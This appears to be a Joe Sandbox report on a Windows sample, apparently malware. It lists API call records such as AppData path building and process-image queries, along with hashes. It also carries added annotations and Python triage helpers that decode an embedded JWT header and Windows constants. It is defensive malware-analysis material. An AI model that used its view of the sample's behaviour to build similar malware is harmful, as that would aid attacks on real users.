                                 • Associated: 00000001.00000002.1388848396.000000000133F000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388969574.00000000014E2000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388987390.00000000014E3000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_e40000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: std::exception::exception$Xinvalid_argumentstd::_
                                • String ID: vector<T> too long$yxxx$yxxx
                                • API String ID: 2002836212-1517697755
                                • Opcode ID: 461a9f785ffc771bcf1f54f4ad0b62532b3150815162f07e5c4d38e676f39eab
                                • Instruction ID: d506518710771c61d677d0be7099223bc62ca7fe9c7a38434cac95262c3279f3
                                • Opcode Fuzzy Hash: 461a9f785ffc771bcf1f54f4ad0b62532b3150815162f07e5c4d38e676f39eab
                                • Instruction Fuzzy Hash: BFF0B437F400210F8314643DAE8849EAD4796E53E077AE726E95AFF399EC70EC8295D4
                                APIs
                                  • Part of subcall function 00E6781C: __mtinitlocknum.LIBCMT ref: 00E67832
                                  • Part of subcall function 00E6781C: __amsg_exit.LIBCMT ref: 00E6783E
                                • ___addlocaleref.LIBCMT ref: 00E68756
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.1388444729.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                 • Associated: 00000001.00000002.1388428212.0000000000E40000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388444729.0000000000E77000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388444729.0000000000ECE000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388444729.0000000000ED6000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388444729.0000000000EEF000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388444729.0000000001078000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388596614.000000000108A000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388610685.000000000108C000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388610685.0000000001222000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388610685.00000000012FF000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388610685.0000000001328000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388610685.000000000132F000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388610685.000000000133E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388848396.000000000133F000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388969574.00000000014E2000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388987390.00000000014E3000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_e40000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: ___addlocaleref__amsg_exit__mtinitlocknum
                                • String ID: KERNEL32.DLL$Xu$xt
                                • API String ID: 3105635775-2689811054
                                • Opcode ID: d16a4b5ea668a202f54f07fa77280b58224e22ed25113c5694fbe82c3f246f0e
                                • Instruction ID: 4116135c86ff742798884d98594b6e46ad163b2a15f283ad5d78249afa918327
                                • Opcode Fuzzy Hash: d16a4b5ea668a202f54f07fa77280b58224e22ed25113c5694fbe82c3f246f0e
                                • Instruction Fuzzy Hash: 5B0188714857009ED724DF79E80974ABBE0AF50364F20AA1EE0D9772E1CBB0A944CB15
                                APIs
                                • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 00E5E544
                                • lstrcpy.KERNEL32(00000000,?), ref: 00E5E573
                                • lstrcat.KERNEL32(?,00000000), ref: 00E5E581
                                • lstrcat.KERNEL32(?,016CDDF0), ref: 00E5E59C
                                Memory Dump Source
                                • Source File: 00000001.00000002.1388444729.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                 • Associated: 00000001.00000002.1388428212.0000000000E40000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388444729.0000000000E77000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388444729.0000000000ECE000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388444729.0000000000ED6000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388444729.0000000000EEF000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388444729.0000000001078000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388596614.000000000108A000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388610685.000000000108C000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388610685.0000000001222000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388610685.00000000012FF000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388610685.0000000001328000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388610685.000000000132F000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388610685.000000000133E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388848396.000000000133F000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388969574.00000000014E2000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388987390.00000000014E3000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_e40000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcat$FolderPathlstrcpy
                                • String ID:
                                • API String ID: 818526691-0
                                • Opcode ID: 7ab389c02642f379e1ac77de4f9e0c7e627e8a7fe9d87debcb82034de6d99f8b
                                • Instruction ID: 52c11d123bebc3201f47c3f8703e1c9ecf28118d4c3bd7427bed944e2756fcea
                                • Opcode Fuzzy Hash: 7ab389c02642f379e1ac77de4f9e0c7e627e8a7fe9d87debcb82034de6d99f8b
                                • Instruction Fuzzy Hash: 8351E6B5A10108AFCB15EB54EC46EFE33F8EB48300F405499FA45B7345EA34AF848BA0
                                APIs
                                Strings
                                • 65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30, xrefs: 00E61FDF, 00E61FF5, 00E620B7
                                Memory Dump Source
                                • Source File: 00000001.00000002.1388444729.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                 • Associated: 00000001.00000002.1388428212.0000000000E40000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388444729.0000000000E77000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388444729.0000000000ECE000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388444729.0000000000ED6000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388444729.0000000000EEF000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388444729.0000000001078000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388596614.000000000108A000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388610685.000000000108C000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388610685.0000000001222000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388610685.00000000012FF000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388610685.0000000001328000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388610685.000000000132F000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388610685.000000000133E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388848396.000000000133F000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388969574.00000000014E2000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388987390.00000000014E3000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_e40000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: strlen
                                • String ID: 65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30
                                • API String ID: 39653677-4138519520
                                • Opcode ID: 9b074a36fc76f23dc842fe845d194b6d457b1a03a8bfb64f962cbf454dee361e
                                • Instruction ID: 406fed25792ccf9909583c9a573ffaddab0254924d74aa8f27870aca409c8d45
                                • Opcode Fuzzy Hash: 9b074a36fc76f23dc842fe845d194b6d457b1a03a8bfb64f962cbf454dee361e
                                • Instruction Fuzzy Hash: CF217E395506898FCB20EB35E4447DDF767DF803E5F84A05AC9183B282E336090AD796
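The String ID of the record above is printed as hex bytes. Read as ASCII it is eyAidHlwIjogIkpXVCIsICJhbGciOiAiRWREU0EiIH0, which is unpadded base64 for { "typ": "JWT", "alg": "EdDSA" }, a JOSE/JWT header naming the EdDSA signature algorithm. The listing only shows the string being measured with strlen; what the sample does with the header is not established here. The Python below is an added triage helper, not part of the Joe Sandbox report or of the sample, that peels such strings layer by layer (hex, ASCII, base64, JSON) and records each layer so the decoding is reproducible. Its input is the String ID exactly as printed above; the layer limit and the JOSE summary format are the helper's own choices.

```python
import base64
import binascii
import json
from typing import Any, List, Optional, Tuple

# Constructed input: the "String ID" hex dump exactly as printed in the
# strlen function record above (one hex byte per token).
STRING_ID_HEX = (
    "65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 "
    "62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30"
)

# Standard and URL-safe base64 alphabets plus padding.
B64_CHARS = set(
    "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/-_="
)


def hex_dump_to_bytes(dump: str) -> bytes:
    """Turn 'XX XX XX ...' into raw bytes (ValueError on a malformed token)."""
    return bytes(int(tok, 16) for tok in dump.split())


def try_base64(text: str) -> Optional[bytes]:
    """Decode standard or URL-safe base64, tolerating stripped '=' padding.
    Returns None when the text is not valid base64 in either alphabet."""
    if len(text) < 4 or any(ch not in B64_CHARS for ch in text):
        return None
    padded = text + "=" * (-len(text) % 4)
    for altchars in (None, b"-_"):
        try:
            return base64.b64decode(padded, altchars=altchars, validate=True)
        except (binascii.Error, ValueError):
            continue
    return None


def peel_layers(data: bytes, max_depth: int = 4) -> List[Tuple[str, Any]]:
    """Decode bytes -> printable ASCII -> base64 -> JSON as far as it goes,
    recording every intermediate layer. Stops at the first layer that is
    not printable ASCII, that parses as a JSON object/array, or that is
    not base64 (so random data is never 'decoded' into garbage)."""
    layers: List[Tuple[str, Any]] = []
    current = data
    for _ in range(max_depth):
        try:
            text = current.decode("ascii")
        except UnicodeDecodeError:
            layers.append(("bytes", current))
            return layers
        if not text.isprintable():
            layers.append(("bytes", current))
            return layers
        layers.append(("ascii", text))
        try:
            obj = json.loads(text)
        except ValueError:
            obj = None
        if isinstance(obj, (dict, list)):
            layers.append(("json", obj))
            return layers
        decoded = try_base64(text.strip())
        if decoded is None or decoded == current:
            return layers
        current = decoded
    return layers


def describe(obj: Any) -> str:
    """Name the common JOSE header shape so it stands out in triage output."""
    if isinstance(obj, dict) and "alg" in obj:
        return "JOSE header: typ=%s alg=%s" % (obj.get("typ"), obj.get("alg"))
    return "decoded %s" % type(obj).__name__


def decode_string_id(dump: str) -> dict:
    """Full pipeline for one Joe Sandbox 'String ID' hex dump."""
    layers = peel_layers(hex_dump_to_bytes(dump))
    final = layers[-1][1] if layers else None
    return {"layers": layers, "final": final, "summary": describe(final)}


if __name__ == "__main__":
    result = decode_string_id(STRING_ID_HEX)
    for kind, value in result["layers"]:
        print("%-5s %r" % (kind, value))
    print(result["summary"])
```

The helper refuses to base64-decode anything outside the base64 alphabet and stops as soon as a layer is no longer printable, so running it over every String ID in a report is safe; only strings that genuinely nest encodings produce more than one layer.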
                                APIs
                                • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 00E5EBB4
                                • lstrcpy.KERNEL32(00000000,?), ref: 00E5EBE3
                                • lstrcat.KERNEL32(?,00000000), ref: 00E5EBF1
                                • lstrcat.KERNEL32(?,016CECA8), ref: 00E5EC0C
                                Memory Dump Source
                                • Source File: 00000001.00000002.1388444729.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                 • Associated: 00000001.00000002.1388428212.0000000000E40000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388444729.0000000000E77000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388444729.0000000000ECE000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388444729.0000000000ED6000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388444729.0000000000EEF000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388444729.0000000001078000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388596614.000000000108A000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388610685.000000000108C000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388610685.0000000001222000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388610685.00000000012FF000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388610685.0000000001328000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388610685.000000000132F000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388610685.000000000133E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388848396.000000000133F000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388969574.00000000014E2000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388987390.00000000014E3000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_e40000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcat$FolderPathlstrcpy
                                • String ID:
                                • API String ID: 818526691-0
                                • Opcode ID: 092f24c5ebea7058d97ee52d4e537c9f758d872c2ad6c88df5b3c8caa0c8ff02
                                • Instruction ID: 07beb5093f5684e8cedb455b3cadea89d52af863928db0f26c30d6316765140c
                                • Opcode Fuzzy Hash: 092f24c5ebea7058d97ee52d4e537c9f758d872c2ad6c88df5b3c8caa0c8ff02
                                • Instruction Fuzzy Hash: 7C31A471A10118ABCB65EF64EC46BED73F4AF48301F5054A8BB46B7341DA34AF448BA0
                                APIs
                                • OpenProcess.KERNEL32(00000410,00000000), ref: 00E64492
                                • GetModuleFileNameExA.PSAPI(00000000,00000000,?,00000104), ref: 00E644AD
                                • CloseHandle.KERNEL32(00000000), ref: 00E644B4
                                • lstrcpy.KERNEL32(00000000,?), ref: 00E644E7
                                Memory Dump Source
                                • Source File: 00000001.00000002.1388444729.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                 • Associated: 00000001.00000002.1388428212.0000000000E40000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388444729.0000000000E77000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388444729.0000000000ECE000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388444729.0000000000ED6000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388444729.0000000000EEF000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388444729.0000000001078000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388596614.000000000108A000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388610685.000000000108C000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388610685.0000000001222000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388610685.00000000012FF000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388610685.0000000001328000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388610685.000000000132F000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388610685.000000000133E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388848396.000000000133F000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388969574.00000000014E2000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388987390.00000000014E3000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_e40000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: CloseFileHandleModuleNameOpenProcesslstrcpy
                                • String ID:
                                • API String ID: 4028989146-0
                                • Opcode ID: 8eec054afd31bfab86700d0701e374fc14e5d7b3dc89a0608f1d88138d5c0bce
                                • Instruction ID: d4f101d9177203ee987d09cbfb1ef6da5682524ea88a0eb1817c74784f31d757
                                • Opcode Fuzzy Hash: 8eec054afd31bfab86700d0701e374fc14e5d7b3dc89a0608f1d88138d5c0bce
                                • Instruction Fuzzy Hash: C4F0C8F0D416152FE731AB74AC49BE676A8AF15318F0045A5FB95F61C0DAB498808790
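The two records above show SHGetFolderPathA(..., 0000001A, ...) followed by lstrcpy and two lstrcat calls, and OpenProcess(00000410, ...) followed by GetModuleFileNameExA(..., 00000104). The numeric arguments decode to well-known Windows constants: CSIDL 0x1A is CSIDL_APPDATA, so the lstrcpy/lstrcat chain assembles a path under the user's %APPDATA% folder; 0x410 is PROCESS_QUERY_INFORMATION | PROCESS_VM_READ, the minimum access needed to read another process's image path with GetModuleFileNameExA; 0x104 is MAX_PATH, the buffer size for that path. The Python below is an added example that serves both records; it is not report or sample code. It parses API call lines in this report's format (the "•" bullet, optional "Part of subcall function" prefix, hex arguments, "?" for a stack slot the sandbox could not resolve, and the "ref:" call-site address) and annotates the constants. The input lines are copied from the records above, and the flag tables deliberately cover only the constants used here.

```python
import re
from typing import Any, Dict, List, Optional

# Constructed input: API call lines copied from the two function records above
# (the SHGetFolderPathA path-building routine and the OpenProcess routine).
REPORT_LINES = [
    "• SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 00E5EBB4",
    "• lstrcpy.KERNEL32(00000000,?), ref: 00E5EBE3",
    "• lstrcat.KERNEL32(?,00000000), ref: 00E5EBF1",
    "• lstrcat.KERNEL32(?,016CECA8), ref: 00E5EC0C",
    "• OpenProcess.KERNEL32(00000410,00000000), ref: 00E64492",
    "• GetModuleFileNameExA.PSAPI(00000000,00000000,?,00000104), ref: 00E644AD",
    "• CloseHandle.KERNEL32(00000000), ref: 00E644B4",
]

# One API call line: optional bullet, optional subcall prefix, Api.MODULE(args), ref: addr.
# CRT entries such as "__getptd.LIBCMT ref: ..." have no argument list.
LINE_RE = re.compile(
    r"^\s*•?\s*(?:Part of subcall function [0-9A-Fa-f]+:\s*)?"
    r"(?P<api>[\w:]+)\.(?P<module>\w+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)

# Windows constants (winnt.h / shlobj.h); only the values relevant here.
PROCESS_ACCESS = {
    0x0001: "PROCESS_TERMINATE",
    0x0002: "PROCESS_CREATE_THREAD",
    0x0008: "PROCESS_VM_OPERATION",
    0x0010: "PROCESS_VM_READ",
    0x0020: "PROCESS_VM_WRITE",
    0x0040: "PROCESS_DUP_HANDLE",
    0x0080: "PROCESS_CREATE_PROCESS",
    0x0400: "PROCESS_QUERY_INFORMATION",
    0x1000: "PROCESS_QUERY_LIMITED_INFORMATION",
    0x00100000: "SYNCHRONIZE",
}
CSIDL_NAMES = {
    0x0000: "CSIDL_DESKTOP",
    0x0005: "CSIDL_PERSONAL",
    0x001A: "CSIDL_APPDATA",
    0x001C: "CSIDL_LOCAL_APPDATA",
    0x0024: "CSIDL_WINDOWS",
    0x0026: "CSIDL_PROGRAM_FILES",
}
CSIDL_FLAG_CREATE = 0x8000
MAX_PATH = 0x104


def parse_args(raw: Optional[str]) -> List[Optional[int]]:
    """'?' is a stack slot the sandbox could not resolve; everything else is hex."""
    if not raw:
        return []
    return [None if tok.strip() == "?" else int(tok, 16) for tok in raw.split(",")]


def decode_flags(value: int, table: Dict[int, str]) -> List[str]:
    """Split a bitmask into named flags, keeping any unknown bits as hex."""
    names, rest = [], value
    for bit in sorted(table):
        if value & bit:
            names.append(table[bit])
            rest &= ~bit
    if rest:
        names.append("0x%X" % rest)
    return names


def decode_csidl(value: int) -> str:
    """Low byte is the folder id; 0x8000 asks the shell to create it."""
    folder = value & 0x00FF
    name = CSIDL_NAMES.get(folder, "CSIDL_0x%X" % folder)
    return name + ("|CSIDL_FLAG_CREATE" if value & CSIDL_FLAG_CREATE else "")


def annotate(api: str, args: List[Optional[int]]) -> Dict[str, Any]:
    """Decode the arguments whose meaning matters for triage."""
    notes: Dict[str, Any] = {}
    if api.startswith("SHGetFolderPath") and len(args) > 1 and args[1] is not None:
        notes["csidl"] = decode_csidl(args[1])
    elif api == "OpenProcess" and args and args[0] is not None:
        notes["access"] = decode_flags(args[0], PROCESS_ACCESS)
    elif api.startswith("GetModuleFileNameEx") and len(args) > 3 and args[3] == MAX_PATH:
        notes["nSize"] = "MAX_PATH (260)"
    return notes


def parse_line(line: str) -> Optional[Dict[str, Any]]:
    m = LINE_RE.match(line)
    if not m:
        return None
    args = parse_args(m.group("args"))
    return {"api": m.group("api"), "module": m.group("module"), "args": args,
            "ref": int(m.group("ref"), 16), "notes": annotate(m.group("api"), args)}


def parse_report(lines: List[str]) -> List[Dict[str, Any]]:
    return [c for c in (parse_line(ln) for ln in lines) if c is not None]


def path_build_folder(calls: List[Dict[str, Any]]) -> Optional[str]:
    """A SHGetFolderPath* call followed within three calls by lstrcpy/lstrcat
    is a path being assembled under that folder; return the folder name."""
    for i, call in enumerate(calls):
        if "csidl" in call["notes"]:
            followers = {c["api"] for c in calls[i + 1:i + 4]}
            if followers & {"lstrcpy", "lstrcat", "lstrcpyA", "lstrcatA"}:
                return call["notes"]["csidl"]
    return None


if __name__ == "__main__":
    calls = parse_report(REPORT_LINES)
    for c in calls:
        print("%08X %-22s %s" % (c["ref"], c["api"], c["notes"] or ""))
    print("path assembled under:", path_build_folder(calls))
```

The argument values are the sandbox's best-effort view of the stack at the call site, so a decoded constant is a lead to confirm in the disassembly at the listed ref address, not proof on its own; the parser therefore keeps unresolved slots as None rather than guessing.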
                                APIs
                                • __getptd.LIBCMT ref: 00E68FDD
                                  • Part of subcall function 00E687FF: __amsg_exit.LIBCMT ref: 00E6880F
                                • __getptd.LIBCMT ref: 00E68FF4
                                • __amsg_exit.LIBCMT ref: 00E69002
                                • __updatetlocinfoEx_nolock.LIBCMT ref: 00E69026
                                Memory Dump Source
                                • Source File: 00000001.00000002.1388444729.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                 • Associated: 00000001.00000002.1388428212.0000000000E40000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388444729.0000000000E77000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388444729.0000000000ECE000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388444729.0000000000ED6000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388444729.0000000000EEF000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388444729.0000000001078000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388596614.000000000108A000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388610685.000000000108C000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388610685.0000000001222000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388610685.00000000012FF000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388610685.0000000001328000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388610685.000000000132F000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388610685.000000000133E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388848396.000000000133F000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388969574.00000000014E2000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388987390.00000000014E3000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_e40000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: __amsg_exit__getptd$Ex_nolock__updatetlocinfo
                                • String ID:
                                • API String ID: 300741435-0
                                • Opcode ID: 3bf484dd372fe3dbca463c9961207538f8f6888dfa3519e5c2426c48103d6c11
                                • Instruction ID: fb7766d529433ae842bb14d1c1a9f8bd8f2c6f675d8549c1e7e985fe4fa99de3
                                • Opcode Fuzzy Hash: 3bf484dd372fe3dbca463c9961207538f8f6888dfa3519e5c2426c48103d6c11
                                • Instruction Fuzzy Hash: B7F06D329C87209ADAA4BB78B80A75922E16F007A9F246219F484BB1D3DF745D40DA55
                                APIs
                                • lstrlen.KERNEL32(------,00E45BEB), ref: 00E6731B
                                • lstrcpy.KERNEL32(00000000), ref: 00E6733F
                                • lstrcat.KERNEL32(?,------), ref: 00E67349
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.1388444729.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                 • Associated: 00000001.00000002.1388428212.0000000000E40000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388444729.0000000000E77000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388444729.0000000000ECE000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388444729.0000000000ED6000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388444729.0000000000EEF000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388444729.0000000001078000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388596614.000000000108A000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388610685.000000000108C000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388610685.0000000001222000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388610685.00000000012FF000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388610685.0000000001328000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388610685.000000000132F000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388610685.000000000133E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388848396.000000000133F000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388969574.00000000014E2000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388987390.00000000014E3000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_e40000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcatlstrcpylstrlen
                                • String ID: ------
                                • API String ID: 3050337572-882505780
                                • Opcode ID: 06563fc13ab1fab897475014258a2d5bf70341ba38d23c4a7370a33336572065
                                • Instruction ID: 9b4db4acad7297d6548b678bda9129aa3573bc73f17b02b81de5e4eae04e213c
                                • Opcode Fuzzy Hash: 06563fc13ab1fab897475014258a2d5bf70341ba38d23c4a7370a33336572065
                                • Instruction Fuzzy Hash: 65F0C9749517029FDB249F35E848926BAF9EF85719318982DA8DAD7308E734E880CF50
                                APIs
                                  • Part of subcall function 00E41530: lstrcpy.KERNEL32(00000000,?), ref: 00E41557
                                  • Part of subcall function 00E41530: lstrcpy.KERNEL32(00000000,?), ref: 00E41579
                                  • Part of subcall function 00E41530: lstrcpy.KERNEL32(00000000,?), ref: 00E4159B
                                  • Part of subcall function 00E41530: lstrcpy.KERNEL32(00000000,?), ref: 00E415FF
                                • lstrcpy.KERNEL32(00000000,?), ref: 00E53422
                                • lstrcpy.KERNEL32(00000000,?), ref: 00E5344B
                                • lstrcpy.KERNEL32(00000000,?), ref: 00E53471
                                • lstrcpy.KERNEL32(00000000,?), ref: 00E53497
                                Memory Dump Source
                                • Source File: 00000001.00000002.1388444729.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
